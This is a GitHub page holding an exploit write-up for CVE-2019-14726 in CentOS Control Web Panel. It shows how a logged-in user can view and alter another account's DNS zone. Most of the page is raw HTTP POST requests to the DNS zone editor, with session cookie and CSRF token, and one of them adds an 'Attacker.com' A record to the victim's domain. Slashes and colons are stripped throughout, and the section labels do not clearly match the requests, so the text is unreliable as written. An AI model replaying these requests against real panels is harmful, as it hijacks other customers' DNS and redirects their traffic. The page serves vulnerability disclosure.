Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

52 lines (45 sloc) 1.75 KB
Exploit Title       : CWP (CentOS Control Web Panel) Access And DNS Record
Date                : 24 Jul 2019
Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage     : https://control-webpanel.com/
Software Link       : Not available, user panel only available for lastest version
Version             : 0.9.8.851
Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number          : CVE-2019-14726
Reference	    : N/A

Access

POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=paserrecord HTTP1.1
Host 192.168.80.1482083
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0
Accept 
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Content-Type applicationx-www-form-urlencoded; charset=UTF-8
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With XMLHttpRequest
Content-Length 16
Connection close
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com

Delete

POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=addregdns HTTP1.1
Host 192.168.80.1482083
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0
Accept 
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Content-Type applicationx-www-form-urlencoded; charset=UTF-8
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With XMLHttpRequest
Content-Length 111
Connection close
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com&namereg=Attacker.com&valuereg=192.168.10.200&cachereg=14400&reg=A&flag=undefined&tag=undefined
You can’t perform that action at this time.